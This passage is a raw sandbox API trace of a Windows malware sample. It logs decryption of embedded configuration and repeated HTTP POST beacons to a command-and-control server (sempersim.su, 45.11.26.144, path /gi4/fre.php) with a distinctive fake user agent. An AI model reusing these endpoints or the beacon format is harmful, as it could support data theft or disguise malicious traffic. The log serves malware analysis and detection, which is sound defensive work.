arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0261.233] GetProcessHeap () returned 0x5b0000 [0261.233] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0261.233] GetProcessHeap () returned 0x5b0000 [0261.233] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0261.235] GetProcessHeap () returned 0x5b0000 [0261.235] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3548 [0261.235] GetProcessHeap () returned 0x5b0000 [0261.235] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0261.236] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0261.237] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0261.237] GetProcessHeap () returned 0x5b0000 [0261.237] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0261.237] GetProcessHeap () returned 0x5b0000 [0261.237] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0261.237] send (s=0x3a8, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0261.238] send (s=0x3a8, buf=0x5d1e18*, len=159, flags=0) returned 159 [0261.238] GetProcessHeap () returned 0x5b0000 [0261.238] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0261.238] recv (in: s=0x3a8, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0262.366] GetProcessHeap () returned 0x5b0000 [0262.366] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0262.366] GetProcessHeap () returned 0x5b0000 [0262.366] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3548 | out: hHeap=0x5b0000) returned 1 [0262.366] GetProcessHeap () returned 0x5b0000 [0262.367] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0262.367] GetProcessHeap () returned 0x5b0000 [0262.367] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0262.367] closesocket (s=0x3a8) returned 0 [0262.369] GetProcessHeap () returned 0x5b0000 [0262.369] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa60 | out: hHeap=0x5b0000) returned 1 [0262.369] GetProcessHeap () returned 0x5b0000 [0262.369] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5910 | out: hHeap=0x5b0000) returned 1 [0262.369] GetProcessHeap () returned 0x5b0000 [0262.369] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3470 | out: hHeap=0x5b0000) returned 1 [0262.369] GetProcessHeap () returned 0x5b0000 [0262.370] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb128 | out: hHeap=0x5b0000) returned 1 [0262.370] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc1c) returned 0x3a8 [0262.371] Sleep (dwMilliseconds=0xea60) [0262.374] GetProcessHeap () returned 0x5b0000 [0262.374] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3590 [0262.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.375] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0262.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.382] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0262.393] GetProcessHeap () returned 0x5b0000 [0262.393] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0262.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.394] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0262.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.395] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0262.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.396] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.396] GetProcessHeap () returned 0x5b0000 [0262.397] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0262.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.398] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3590, pdwDataLen=0xdfcfc | out: pbData=0x5d3590, pdwDataLen=0xdfcfc) returned 1 [0262.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.399] CryptDestroyKey (hKey=0x5be048) returned 1 [0262.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.400] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0262.400] GetProcessHeap () returned 0x5b0000 [0262.400] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5070 [0262.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0262.401] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0262.401] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0262.401] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0262.402] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0262.402] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0262.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0262.403] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0262.403] GetProcessHeap () returned 0x5b0000 [0262.403] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0262.403] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0262.403] GetProcessHeap () returned 0x5b0000 [0262.404] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0262.404] GetProcessHeap () returned 0x5b0000 [0262.404] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5070 | out: hHeap=0x5b0000) returned 1 [0262.404] GetProcessHeap () returned 0x5b0000 [0262.404] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3590 | out: hHeap=0x5b0000) returned 1 [0262.404] GetProcessHeap () returned 0x5b0000 [0262.404] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e88 [0262.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.409] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0262.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.417] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0262.439] GetProcessHeap () returned 0x5b0000 [0262.439] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0262.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.440] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0262.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.441] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0262.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.446] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0262.446] GetProcessHeap () returned 0x5b0000 [0262.446] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0262.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.447] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e88, pdwDataLen=0xdfcfc | out: pbData=0x5d2e88, pdwDataLen=0xdfcfc) returned 1 [0262.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.449] CryptDestroyKey (hKey=0x5be048) returned 1 [0262.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0262.450] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0262.450] GetProcessHeap () returned 0x5b0000 [0262.450] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5b38 [0262.451] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0262.451] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0262.452] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0262.452] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0262.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0262.453] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0262.453] GetProcessHeap () returned 0x5b0000 [0262.453] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0262.453] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdbd8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0262.463] GetProcessHeap () returned 0x5b0000 [0262.463] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca990 [0262.463] socket (af=2, type=1, protocol=6) returned 0x3ac [0262.463] connect (s=0x3ac, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0262.533] FreeAddrInfoW (pAddrInfo=0x5cdbd8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0262.533] GetProcessHeap () returned 0x5b0000 [0262.533] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5aa8 [0262.533] GetProcessHeap () returned 0x5b0000 [0262.533] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0262.534] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0262.535] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0262.535] GetProcessHeap () returned 0x5b0000 [0262.535] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0262.535] GetProcessHeap () returned 0x5b0000 [0262.535] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0262.535] GetProcessHeap () returned 0x5b0000 [0262.535] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3500 [0262.536] GetProcessHeap () returned 0x5b0000 [0262.536] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0262.536] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0262.537] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0262.537] GetProcessHeap () returned 0x5b0000 [0262.537] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0262.537] GetProcessHeap () returned 0x5b0000 [0262.537] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0262.538] send (s=0x3ac, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0262.538] send (s=0x3ac, buf=0x5d1e18*, len=159, flags=0) returned 159 [0262.538] GetProcessHeap () returned 0x5b0000 [0262.538] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0262.538] recv (in: s=0x3ac, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0263.730] GetProcessHeap () returned 0x5b0000 [0263.730] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0263.730] GetProcessHeap () returned 0x5b0000 [0263.731] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3500 | out: hHeap=0x5b0000) returned 1 [0263.731] GetProcessHeap () returned 0x5b0000 [0263.731] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0263.731] GetProcessHeap () returned 0x5b0000 [0263.731] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5aa8 | out: hHeap=0x5b0000) returned 1 [0263.731] closesocket (s=0x3ac) returned 0 [0263.733] GetProcessHeap () returned 0x5b0000 [0263.733] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca990 | out: hHeap=0x5b0000) returned 1 [0263.733] GetProcessHeap () returned 0x5b0000 [0263.733] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5b38 | out: hHeap=0x5b0000) returned 1 [0263.733] GetProcessHeap () returned 0x5b0000 [0263.734] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e88 | out: hHeap=0x5b0000) returned 1 [0263.734] GetProcessHeap () returned 0x5b0000 [0263.734] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0263.734] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc20) returned 0x3ac [0263.739] Sleep (dwMilliseconds=0xea60) [0263.750] GetProcessHeap () returned 0x5b0000 [0263.750] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d33e0 [0263.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.751] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0263.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.764] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0263.780] GetProcessHeap () returned 0x5b0000 [0263.780] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0263.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.800] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0263.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.802] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0263.803] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.803] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.803] GetProcessHeap () returned 0x5b0000 [0263.804] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0263.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.805] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d33e0, pdwDataLen=0xdfcfc | out: pbData=0x5d33e0, pdwDataLen=0xdfcfc) returned 1 [0263.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.822] CryptDestroyKey (hKey=0x5be288) returned 1 [0263.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.823] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0263.823] GetProcessHeap () returned 0x5b0000 [0263.823] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0263.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0263.824] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0263.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0263.825] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0263.826] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0263.826] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0263.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0263.828] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0263.828] GetProcessHeap () returned 0x5b0000 [0263.828] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0263.828] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0263.828] GetProcessHeap () returned 0x5b0000 [0263.828] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0263.829] GetProcessHeap () returned 0x5b0000 [0263.829] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0263.829] GetProcessHeap () returned 0x5b0000 [0263.829] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d33e0 | out: hHeap=0x5b0000) returned 1 [0263.829] GetProcessHeap () returned 0x5b0000 [0263.829] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3500 [0263.830] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.830] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0263.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.836] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0263.846] GetProcessHeap () returned 0x5b0000 [0263.846] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0263.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.847] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0263.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.848] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0263.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.849] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.849] GetProcessHeap () returned 0x5b0000 [0263.849] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0263.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.850] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3500, pdwDataLen=0xdfcfc | out: pbData=0x5d3500, pdwDataLen=0xdfcfc) returned 1 [0263.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.851] CryptDestroyKey (hKey=0x5be288) returned 1 [0263.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0263.852] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0263.852] GetProcessHeap () returned 0x5b0000 [0263.852] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0263.853] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0263.853] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0263.854] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0263.854] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0263.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0263.855] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0263.855] GetProcessHeap () returned 0x5b0000 [0263.855] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0263.855] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cd9d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0263.858] GetProcessHeap () returned 0x5b0000 [0263.858] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa00 [0263.858] socket (af=2, type=1, protocol=6) returned 0x3b0 [0263.858] connect (s=0x3b0, name=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0263.930] FreeAddrInfoW (pAddrInfo=0x5cd9d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0263.930] GetProcessHeap () returned 0x5b0000 [0263.930] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0263.930] GetProcessHeap () returned 0x5b0000 [0263.930] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0263.931] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0263.931] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0263.932] GetProcessHeap () returned 0x5b0000 [0263.932] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0263.932] GetProcessHeap () returned 0x5b0000 [0263.932] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0263.933] GetProcessHeap () returned 0x5b0000 [0263.933] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e88 [0263.933] GetProcessHeap () returned 0x5b0000 [0263.933] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0263.935] 